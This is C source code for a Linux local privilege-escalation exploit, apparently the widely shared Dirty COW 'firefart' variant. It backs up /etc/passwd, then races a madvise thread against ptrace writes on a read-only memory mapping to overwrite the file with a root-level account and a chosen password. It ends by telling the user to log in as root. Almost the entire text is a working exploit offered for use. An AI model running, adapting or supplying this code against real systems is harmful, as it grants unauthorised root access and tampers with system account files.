#include <fcntl.h>#include <pthread.h>#include <string.h>#include <stdio

1.  
2. #include <fcntl.h>
3. #include <pthread.h>
4. #include <string.h>
5. #include <stdio.h>
6. #include <stdint.h>
7. #include <sys/mman.h>
8. #include <sys/types.h>
9. #include <sys/stat.h>
10. #include <sys/wait.h>
11. #include <sys/ptrace.h>
12. #include <stdlib.h>
13. #include <unistd.h>
14. #include <crypt.h>
15.  
16. const char *filename = "/etc/passwd";
17. const char *backup_filename = "/tmp/passwd.bak";
18. const char *salt = "firefart";
19.  
20. int f;
21. void *map;
22. pid_t pid;
23. pthread_t pth;
24. struct stat st;
25.  
26. struct Userinfo {
27. char *username;
28. char *hash;
29. int user_id;
30. int group_id;
31. char *info;
32. char *home_dir;
33. char *shell;
34. };
35.  
36. char *generate_password_hash(char *plaintext_pw) {
37. return crypt(plaintext_pw, salt);
38. }
39.  
40. char *generate_passwd_line(struct Userinfo u) {
41. const char *format = "%s:%s:%d:%d:%s:%s:%s\n";
42. int size = snprintf(NULL, 0, format, u.username, u.hash,
43. u.user_id, u.group_id, u.info, u.home_dir, u.shell);
44. char *ret = malloc(size + 1);
45. sprintf(ret, format, u.username, u.hash, u.user_id,
46. u.group_id, u.info, u.home_dir, u.shell);
47. return ret;
48. }
49.  
50. void *madviseThread(void *arg) {
51. int i, c = 0;
52. for(i = 0; i < 200000000; i++) {
53. c += madvise(map, 100, MADV_DONTNEED);
54. }
55. printf("madvise %d\n\n", c);
56. }
57.  
58. int copy_file(const char *from, const char *to) {
59. // check if target file already exists
60. if(access(to, F_OK) != -1) {
61. printf("File %s already exists! Please delete it and run again\n",
62. to);
63. return -1;
64. }
65.  
66. char ch;
67. FILE *source, *target;
68.  
69. source = fopen(from, "r");
70. if(source == NULL) {
71. return -1;
72. }
73. target = fopen(to, "w");
74. if(target == NULL) {
75. fclose(source);
76. return -1;
77. }
78.  
79. while((ch = fgetc(source)) != EOF) {
80. fputc(ch, target);
81. }
82.  
83. printf("%s successfully backed up to %s\n",
84. from, to);
85.  
86. fclose(source);
87. fclose(target);
88.  
89. return 0;
90. }
91.  
92. int main(int argc, char *argv[])
93. {
94. // backup file
95. int ret = copy_file(filename, backup_filename);
96. if (ret != 0) {
97. exit(ret);
98. }
99.  
100. struct Userinfo user;
101. // set values, change as needed
102. user.username = "root";
103. user.user_id = 0;
104. user.group_id = 0;
105. user.info = "pwned";
106. user.home_dir = "/root";
107. user.shell = "/bin/bash";
108.  
109. char *plaintext_pw;
110.  
111. if (argc >= 2) {
112. plaintext_pw = argv[1];
113. printf("Please enter the new password: %s\n", plaintext_pw);
114. } else {
115. plaintext_pw = getpass("Please enter the new password: ");
116. }
117.  
118. user.hash = generate_password_hash(plaintext_pw);
119. char *complete_passwd_line = generate_passwd_line(user);
120. printf("Complete line:\n%s\n", complete_passwd_line);
121.  
122. f = open(filename, O_RDONLY);
123. fstat(f, &st);
124. map = mmap(NULL,
125. st.st_size + sizeof(long),
126. PROT_READ,
127. MAP_PRIVATE,
128. f,
129. 0);
130. printf("mmap: %lx\n",(unsigned long)map);
131. pid = fork();
132. if(pid) {
133. waitpid(pid, NULL, 0);
134. int u, i, o, c = 0;
135. int l=strlen(complete_passwd_line);
136. for(i = 0; i < 10000/l; i++) {
137. for(o = 0; o < l; o++) {
138. for(u = 0; u < 10000; u++) {
139. c += ptrace(PTRACE_POKETEXT,
140. pid,
141. map + o,
142. *((long*)(complete_passwd_line + o)));
143. }
144. }
145. }
146. printf("ptrace %d\n",c);
147. }
148. else {
149. pthread_create(&pth,
150. NULL,
151. madviseThread,
152. NULL);
153. ptrace(PTRACE_TRACEME);
154. kill(getpid(), SIGSTOP);
155. pthread_join(pth,NULL);
156. }
157.  
158. printf("Done! Check %s to see if the new user was created\n", filename);
159. printf("You can log in with username %s and password %s.\n\n",
160. user.username, plaintext_pw);
161. printf("\nDON'T FORGET TO RESTORE %s FROM %s !!!\n\n",
162. filename, backup_filename);
163. return 0;
164. }